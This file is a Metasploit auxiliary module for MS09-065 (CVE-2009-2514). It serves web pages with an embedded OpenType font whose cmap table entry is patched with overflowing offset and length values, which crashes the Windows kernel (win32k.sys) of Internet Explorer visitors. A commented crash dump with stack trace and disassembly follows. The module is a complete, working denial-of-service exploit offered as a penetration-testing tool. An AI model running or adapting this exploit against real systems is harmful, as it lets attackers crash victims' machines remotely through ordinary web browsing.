## # $Id: ms09_065_eot_integer.rb 7470 2009-11-11 23:48:53Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows EOT Font Table Directory Integer Overflow', 'Description' => %q{ This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer. }, 'License' => MSF_LICENSE, 'Author' => 'hdm', 'Version' => '$Revision: 7470 $', 'References' => [ [ 'CVE', '2009-2514' ], [ 'MSB', 'MS09-065' ], [ 'OSVDB', '59869'] ], 'DisclosureDate' => 'Nov 10 2009' )) register_options([ OptPath.new('EOTFILE', [ true, "The EOT template to use to generate the trigger", File.join(Msf::Config.install_root, "data", "exploits", "pricedown.eot")]), ], self.class) end def run exploit end def on_request_uri(cli, request) @tag ||= Rex::Text.rand_text_alpha(8) @eot ||= ::File.read(datastore['EOTFILE'], ::File.size(datastore['EOTFILE'])) if(request.uri =~ /#{@tag}$/) content = @eot.dup # Only this table entry seems to trigger the bug cidx = content.index('cmap') # Use an offset and a length that overflow when combined coff = 0xb0000000 clen = (0xfffffffe - coff + 0xcc) # Patch in the modified offset and length values content[cidx + 8, 8] = [ coff, clen ].pack("N*") # Send the font on its merry way print_status("Sending embedded font to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content, { 'Content-Type' => 'application/octet-stream' }) else var_title = Rex::Text.rand_text_alpha(6 + rand(32)) var_body = Rex::Text.rand_text_alpha(64 + rand(32)) var_font = Rex::Text.rand_text_alpha(2 + rand(6)) var_face = Rex::Text.rand_text_alpha(2 + rand(32)) content = %Q|#{var_title} #{var_body} | print_status("Sending HTML page with embedded font to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content, { 'Content-Type' => 'text/html' }) end end end =begin # # Crash dump information # READ_ADDRESS: b0f70072 FAULTING_IP: win32k!bComputeIDs+28 bf87c9df 8a6702 mov ah,byte ptr [edi+2] MM_INTERNAL_CODE: 0 IMAGE_NAME: win32k.sys DEBUG_FLR_IMAGE_TIMESTAMP: 45f013f6 MODULE_NAME: win32k FAULTING_MODULE: bf800000 win32k DEFAULT_BUCKET_ID: DRIVER_FAULT BUGCHECK_STR: 0x50 PROCESS_NAME: csrss.exe TRAP_FRAME: b22192e8 -- (.trap 0xffffffffb22192e8) ErrCode = 00000000 eax=00000000 ebx=00000000 ecx=500000ca edx=00f70010 esi=b22198d8 edi=b0f70070 eip=bf87c9df esp=b221935c ebp=b2219374 iopl=0 nv up ei pl nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206 win32k!bComputeIDs+0x28: bf87c9df 8a6702 mov ah,byte ptr [edi+2] ds:0023:b0f70072=?? Resetting default scope LAST_CONTROL_TRANSFER: from 804f79d7 to 80526fc8 STACK_TEXT: b2218e24 804f79d7 00000003 b0f70072 00000000 nt!RtlpBreakWithStatusInstruction b2218e70 804f85c4 00000003 00000000 c0587b80 nt!KiBugCheckDebugBreak+0x19 b2219250 804f8aef 00000050 b0f70072 00000000 nt!KeBugCheck2+0x574 b2219270 8051c0d3 00000050 b0f70072 00000000 nt!KeBugCheckEx+0x1b b22192d0 8053f90c 00000000 b0f70072 00000000 nt!MmAccessFault+0x8e7 b22192d0 bf87c9df 00000000 b0f70072 00000000 nt!KiTrap0E+0xcc b2219374 bf87a391 00f70010 b22198d8 b2219a76 win32k!bComputeIDs+0x28 b22193a8 bf87a02b 00f70010 00004d18 00000000 win32k!bVerifyTTF+0xe1 b2219a68 bf879f0e e234b668 00f70010 00004d18 win32k!bLoadTTF+0x7c b2219af0 bf879e48 e234b668 00f70010 00004d18 win32k!bLoadFontFile+0x228 b2219b40 bf879911 00000001 e234b660 b2219bf0 win32k!ttfdSemLoadFontFile+0x4c b2219b70 bf87989f 00000001 e234b660 b2219bf0 win32k!PDEVOBJ::LoadFontFile+0x3a b2219ba8 bf96370c 00000000 00000000 e234b660 win32k!vLoadFontFileView+0x12b b2219c5c bf93eda9 e234b660 00000000 00000000 win32k!PUBLIC_PFTOBJ::hLoadMemFonts+0x6a b2219cb4 bf9488e4 00f70000 e10ff0b0 00000000 win32k!GreAddFontMemResourceEx+0x76 b2219d48 8053ca28 0297cc48 00004d18 00000000 win32k!NtGdiAddFontMemResourceEx+0xb0 b2219d48 7c90eb94 0297cc48 00004d18 00000000 nt!KiFastCallEntry+0xf8 0172f6dc 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet win32k!bComputeIDs: bf87c9b7 8bff mov edi,edi bf87c9b9 55 push ebp bf87c9ba 8bec mov ebp,esp bf87c9bc 83ec10 sub esp,10h bf87c9bf 8b450c mov eax,dword ptr [ebp+0Ch] bf87c9c2 8b4804 mov ecx,dword ptr [eax+4] bf87c9c5 53 push ebx bf87c9c6 57 push edi bf87c9c7 8b38 mov edi,dword ptr [eax] bf87c9c9 037d08 add edi,dword ptr [ebp+8] bf87c9cc 33db xor ebx,ebx bf87c9ce 33c0 xor eax,eax bf87c9d0 83f904 cmp ecx,4 bf87c9d3 895df8 mov dword ptr [ebp-8],ebx bf87c9d6 894dfc mov dword ptr [ebp-4],ecx bf87c9d9 0f82cf000000 jb win32k!bComputeIDs+0x1be (bf87caae) bf87c9df 8a6702 mov ah,byte ptr [edi+2] <--- the crash above =end